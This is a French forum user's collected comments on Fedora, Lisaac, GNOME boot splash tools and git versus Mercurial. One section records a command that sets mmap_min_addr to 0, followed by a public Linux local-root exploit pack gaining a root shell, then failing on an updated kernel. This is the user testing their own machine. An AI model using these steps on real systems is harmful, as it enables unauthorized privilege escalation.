Mildred a écrit 2245 commentaires

Un music store fourni pour les utilisateurs de Linux avec des codecs libres (ogg vorbis, flac), ça ne me déplairait pas le moins du monde. Et si ça peut financer Canonical, je ne vois pas le problème.

Maintenant, j'utilise Fedora justement, donc ça me touche de moins près. En tout cas, je trouve que c'est une bonne distribution, à jour des nouveautés. En plus, Fedora innove, et c'est sensible.

Le seul petit problème que je peux voir c'est que les logiciels brevetés sont accessibles uniquement via rpmfusion qui est vraiment un projet à part. Ce n'est pas un grand problème, mais lorsque les mp3 ne marche plus, on va vite voir comment faire.

Je sais que les brevets logiciels c'est mal, et c'est bien pour ça que je profite au maximum du fait que ca n'existe pas en France.

Au final, j'ai l'impression que cette distribution est peu utilisée, et je ne vois pas pourquoi, elle est d'une très bonne qualité et je la trouve beaucoup moins complexe que Debian. Parfois j'ai l'impression que Debian choisit toujours la manière la plus complexe de résoudre un problème...

Les pointeurs posent problème au compilateur et l'empêche d'optimiser plein de trucs. Vu que le programmeur peut virtuellement faire n'importe quoi.

L'intention est louable mais le problème c'est que ton code est illisible. Sans parenthèses je me demande toujours si je doit comprendre (45020089/8)! ou bien 45020089/(8!). Et le fait de pouvoir spécifier la priorité de ces opérateurs de manière différente suivant le type de données manipulée rend les choses encore pire.
Quand je vois les horreurs qui sont fait avec la surcharge des opérateurs en C++, je n'imagine même pas à quoi on finira pas arriver en Lisaac.

On ne peux pas en Lisaac mélanger des opérateurs avec des types différents. Le compilateur ne s'en sort plus sinon.

Le GC est désactivable, et pour donner un exemple, il est désactivé dans le code du compilateur, au profit d'une gestion à la main assez rigoureuse. Comme tout est en lib, on peut tout à fait définir le delete de c++.


Le GC ne marche plus du tout en fait.

Gtk, avev Gobject-introspection, ça devrait être très facile

http://live.gnome.org/GObjectIntrospection/

Finalement, ça doit être dans gnome-settings-daemon.
Peut être même ici: http://git.gnome.org/cgit/gnome-settings-daemon/tree/plugins(...) (gsd-media-keys-window.[ch])

tu dois pouvoir copier le code.

Dans GNOME, les affichages pour quand on change la luminosité ou le volume correspondent exactement à ce que tu cherche. Par contre je ne sais pas si ils ont utilisé une bibliothèque spécifique, et si oui, laquelle.

A mon avis, ça doit se trouver quelque part dans metacity, mais je dois avouer n'avoir aucune idée sur la question.

Sinon, il y a libaosd [http://hg.atheme.org/libaosd/] que j'ai utilisée il y a un moment, mais je crois qu'elle est opaque à la souris :( En tout cas, c'est déjà bien mieux que xosd.

uname -a:

Linux kylae 2.6.31.5-96.fc12.i686.PAE #1 SMP Fri Oct 23 19:39:36 EDT 2009 i686 i686 i386 GNU/Linux

Et pour les applications Windos 16 bits ?

En passant, SELinux est désactivé et cat /proc/sys/vm/mmap_min_addr affiche 4096

Maintenant si


$ sudo sh -c 'echo 0 > /proc/sys/vm/mmap_min_addr'
$ cat /proc/sys/vm/mmap_min_addr
0


Et l'exploit fonctionne, avec un joli message qui moque SELinux, et j'ai un shell root.


$ ./run_null_exploits.sh
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...OK.
Compiling exp_wunderbar.c...OK.
[+] MAPPED ZERO PAGE!
Choose your exploit:
[0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
[1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root
[2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root
[3] Powerglove: Linux 2.6.31 perf_counter local root
[4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
[5] CVE-2009-2267: VMWare vm86 guest local root
[6] Wunderbar Emporium: Linux 2.X sendpage() local root
[7] Exit
> 1
------------------------------------------------------------------------------
With people of limited ability modesty is merely honesty. But with those
who possess real talent it is hypocrisy. --Schopenhauer
------------------------------------------------------------------------------
[+] Resolved ima_audit to 0xc0acd58c
[+] Resolved ima_file_mmap to 0xc057da68
[+] Resolved ima_bprm_check to 0xc057da8d
[+] Resolved ima_path_check to 0xc057d742
[+] Resolved selinux_enforcing to 0xc0acb1f8
[+] Resolved selinux_enabled to 0xc097232c
[+] Resolved security_ops to 0xc0aca1cc
[+] Resolved default_security_ops to 0xc0971e4c
[+] Resolved sel_read_enforce to 0xc05714a3
[+] Resolved audit_enabled to 0xc0a6e46c
[+] Resolved commit_creds to 0xc0455765
[+] Resolved prepare_kernel_cred to 0xc04555c6
[+] Using newer pipe_inode_info layout
[+] We'll let this go for a while if needed...
[+] got ring0!
[+] detected cred support
[+] Disabled security of : nothing, what an insecure machine!
[+] Got root!
...
(GConf errors)
...
sh-4.0# id
uid=0(root) gid=0(root)
sh-4.0# exit


Et je ne pense pas que PulseAudio ait grand chose a voir avec cet exploit, il me semble qu'il s'agit d'autre chose.

Maintenant:
$ sudo sh -c 'echo 4096 > /proc/sys/vm/mmap_min_addr'

Suer une Fedora 12 (rawhide pour le moment) à jour de ce matin:


./run_null_exploits.sh
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...OK.
Compiling exp_wunderbar.c...OK.
[+] Personality set to: PER_SVR4
Pulseaudio is not suid root!

./run_nonnull_exploits.sh
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...OK.
Compiling exp_wunderbar.c...OK.
Choose your exploit:
[0] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)
[1] Exit
> 0
------------------------------------------------------------------------------
Before the Law stands a doorkeeper. To this doorkeeper there comes a man
from the country who begs for admittance to the Law. But the doorkeeper
says that he cannot admit the man at the moment. The man, on reflection,
asks if he will be allowed, then, to enter later. 'It is possible,' answers
the doorkeeper, 'but not at this moment.' Since the door leading into the
Law stands open as usual and the doorkeeper steps to one side, the man bends
down to peer through the entrance. When the doorkeeper sees that, he laughs
and says: 'If you are so strongly tempted, try to get in without my
permission. But note that I am powerful. And I am only the lowest
doorkeeper. From hall to hall, keepers stand at every door, one more
powerful than the other. And the sight of the third man is already more
than even I can stand.' These are difficulties which the man from the
country has not expected to meet, the Law, he thinks, should be accessible
to every man and at all times, but when he looks more closely at the
doorkeeper in his furred robe, with his huge, pointed nose and long, thin,
Tartar beard, he decides that he had better wait until he gets permission to
enter. The doorkeeper gives him a stool and lets him sit down at the side
of the door. There he sits waiting for days and years. He makes many
attempts to be allowed in and wearies the doorkeeper with his importunity.
The doorkeeper often engages him in brief conversation, asking him about his
home and about other matters, but the questions are put quite impersonally,
as great men put questions, and always conclude with the statement that the
man cannot be allowed to enter yet. The man, who has equipped himself with
many things for his journey, parts with all he has, however valuable, in the
hope of bribing the doorkeeper. The doorkeeper accepts it all, saying,
however, as he takes each gift: 'I take this only to keep you from feeling
that you have left something undone.' During all these long years the man
watches the doorkeeper almost incessantly. He forgets about the other
doorkeepers, and this one seems to him the only barrier between himself and
the Law. In the first years he curses his evil fate aloud; later, as he
grows old, he only mutters to himself. He grows childish, and since in his
prolonged study of the doorkeeper he has learned to know even the fleas in
his fur collar, he begs the very fleas to help him and to persuade the
doorkeeper to change his mind. Finally his eyes grow dim and he does not
know whether the world is really darkening around him or whether his eyes
are only deceiving him. But in the darkness he can now perceive a radiance
that streams inextinguishably from the door of the Law. Now his life is
drawing to a close. Before he dies, all that he has experienced during the
whole time of his sojourn condenses in his mind into one question, which he
has never yet put to the doorkeeper. He beckons the doorkeeper, since he
can no longer raise his stiffening body. The doorkeeper has to bend far
down to hear him, for the difference in size between them has increased very
much to the man's disadvantage. 'What do you want to know now?' asks the
doorkeeper, 'you are insatiable.' 'Everyone strives to attain the Law,'
answers the man, 'how does it come about, then, that in all these years no
one has come seeking admittance but me?' The doorkeeper perceives that the
man is nearing his end and his hearing is failing, so he bellows in his ear:
'No one but you could gain admittance through this door, since this door was
intended for you. I am now going to shut it.' --Kafka
------------------------------------------------------------------------------
[+] Resolved ima_audit to 0xc0acd58c
[+] Resolved ima_file_mmap to 0xc057da68
[+] Resolved ima_bprm_check to 0xc057da8d
[+] Resolved ima_path_check to 0xc057d742
[+] Resolved selinux_enforcing to 0xc0acb1f8
[+] Resolved selinux_enabled to 0xc097232c
[+] Resolved security_ops to 0xc0aca1cc
[+] Resolved default_security_ops to 0xc0971e4c
[+] Resolved sel_read_enforce to 0xc05714a3
[+] Resolved audit_enabled to 0xc0a6e46c
[+] Resolved commit_creds to 0xc0455765
[+] Resolved prepare_kernel_cred to 0xc04555c6
System is not vulnerable.


Et depuis que Fedora gère KMS (Kernel ModeSetting) sur mon mac, j'ai presque la même chose sous Linux, le retour du suspend-to-ram est très rapide.

Le seul inconvénient que je vois, c'est que NetworkManager s'est déconnecté, et prend un temps pour se reconnecter.

Je suppose qu'avec Mac OS X, le wifi est aussi déconnecté, mais au réveil l'OS se considère connecté et les paquets sont mis en attente, tant que le wifi n'est pas réellement reconnecté. Ce serait bien d'avoir la même chose chez nous.

En tout cas, j'hésite beaucoup moins à faire un suspend-to-ram pour me déplacer avec mon ordinateur.

Pour les e-mails, beaucoup de sies qui les valident, les valident mal:

http://linuxfr.org/comments/943583.html#943583
http://www.linuxjournal.com/article/9585

Mac OS X démarre très rapidement, en tout cas dans ses dernières versions. C'est vrai qu'au début, je trouvait ça lent, mais plus maintenant.

Ce ne serait pas par hasard un fsck qui vérifie ton disque ?
Sinon, tu peux regarder les messages en console (je pense que Esc doit effacer le splash screen pour afficher la console, a l'époque où j'ai utilisé Ubuntu, ça marchait comme ça). Et tu devrais voir où ça bloque.

C'est peut être simplement un timeout réseau

Si, j'avais la barre bleue et blanche, je ne savais pas que c'était plymouth. Mais je suis bien d'accord, c'est entièrement suffisant si on a pas des pilotes compatibles KMS.

Et pour EFI, je pense que même si ça n'intervient pas directement avec KMS, ça devait jouer un peu. A l'époque de la sortie de Fedora 11 j'avais testé grandement plusieurs configurations différentes, et ça semblait être corrélé.

Mais maintenant, ça marche bien. Et j'aime bien Fedora pour ça, ils sont très proche de l'upstream.

( et puis, avoir moins de 10s de boot, faut passer par coreboot amha, sinon ç'est relativement dur, mais je vois pas Canonical faire reflasher le bios des utilisateurs ).

Je pense qu'ils visent 10 secondes une fois que le BIOS ou GRUB a fini son travail.

Sinon, c'est trop dépendant du hardware

Bon, j'ai posté avant d'avoir tout lu, honte à moi

Je ne sais pas comment fonctionne exactement xsplash, mais si je me fie à ta description, ça ressemble drôlement à RHGB qui était lent, lourd et une impasse.

En l'occurence, Xsplash n'est pas du tout pareil que RHGB. Xsplash utilise le même serveur X du début à la fin. RHGB démarrait un serveur X rien que pour le splash screen, puis l'arrêtait et démarrait le serveur X pour le login et la session.

En l'occurence, c'est depuis hier et ma mist à jour Fedora 11 -> Fedora 12ß que j'ai pu goûter à plymouth, avant j'avais la console.

mais en même temps, c'est sans doute dû au fait que jusqu'à dernièrement, ma carte intel ne fonctionnait pas avec KMS (peut être parce que j'ai EFI sur ma machine, et le BIOS était émulé)

Il faut rappeler que Gnome-Shell c'est pour Gnome 3.

Avec Fedora, j'ai la possibilité d'activer Gnome-Shell, mais on voit bien que c'est encore en plein développement. Par exemple, aucun raccourci clavier n'est configurable (et avec mon clavier un tout petit peu particulier, ça veut dire que je n'ai pas du tout de raccourci clavier).

Ceci dit, c'est très prometteur.

On peut noter aussi la disparition de la gravure via
Nautilus dans cette nouvelle version de Gnome.

Qui utilisait ça ? franchement ?
(moi jamais ... depuis la 5.04)


Je ne grave pas souvent, mais quand je grave un disque de données, c'est le suel outil dont j'avais besoin. Je n'ai pas encore eu l'occasion de graver mais j'espère que la nouvelle manière de faire est aussi simple.

Scott James Remnant (l'auteur de upstart et fervent défenseur de Xsplash¹) explique son choix par trois raisons:

- Xsplash est aussi compatible avec du matériel/drivers qui ne supporte pas KMS
- XSplash fournit un serveur X complet et permet donc rapidement la mise en place d'une interface graphique pour intéragit avec l'utilisateur. Il imagine entrer le mot de passe d'une partition chiffrée, mais on peux aussi imaginer un fsck intéractif.
- Si on peux démarrer plymouth, c'est qu'on peut démarrer Xorg, autant démarrer directement Xorg.

Il ne fait pas oublier que cela s'inscrit dans le projet d'Ubuntu qui veux un démarrage en moins de 10s. Dans ce contexte, démarrer plymouth pour le remplacer par Xorg très rapidement peux sembler une charge supplémentaire et inutile.

Ceci dit, je n'ai pas les conaissances techniques pour juger par moi même, et j'aime bien plymouth qui vient avec Fedora 12ß qui me permet d'avoir un boot graphique avec EFI et KMS (MacBook).


¹ http://www.netsplit.com/2009/09/02/making-a-splash/

Par exemple pour avoir un bureau qui s'étend sur deux écrans. Avoir plus de place quoi.

Pour moi, gitk et git gui (ou git citool) me suffisent comme interface graphique.

Certaines opérations sont plus faciles avec une interface graphique (voir l'historique, choisir exactement les lignes qu'on veut commiter (git add -i), ...) mais d'autres sont bien plus faciles en ligne de commande.

Mercurial et git sont très proches. J'utilisais Mercurial avant de passer à git, et finalement je préfère git :/

Pour moi, les différences que je vois sont:
- Dans git, tu peux perdre des commits facilement (par exemple en faisant un rebase, tu as des commits équivalents, mais pas exactement les même). Mercurial est beaucoup plus prudent je crois
- Avec git, lorsque tu clone un repository (pour travailler dessus en local par exemple) tu ne copies en fait que la branche master (en général). Ce qui fait que si tu partages à ton tour ton repository, tu ne partages que la branche master et pas les autres. J'ai trouvé ça inconfortable pour faire des échanges de commits entre un portable et une station via un repository sur clef usb.
- Dans Mercurial, chaque commit est associé à une branche. Ce qui fait qu'il est possible pour une branche d'avoir plusieurs têtes (heads). Avec git, seules les têtes peuvent être associées à une branche, et une branche ne peux avoir qu'une seule tête. Avec Mercurial, les merges se font entre plusieurs têtes de la même branche en général alors qu'avec git, c'est entre deux branches, la branche origin/branchname et branchname.
- git est populaire et avance très vite.
- git peux être difficile à prendre en main au départ
- le livre Mercurial est très bien fait
- git te laisse accéder à ses couches bas-niveau facilement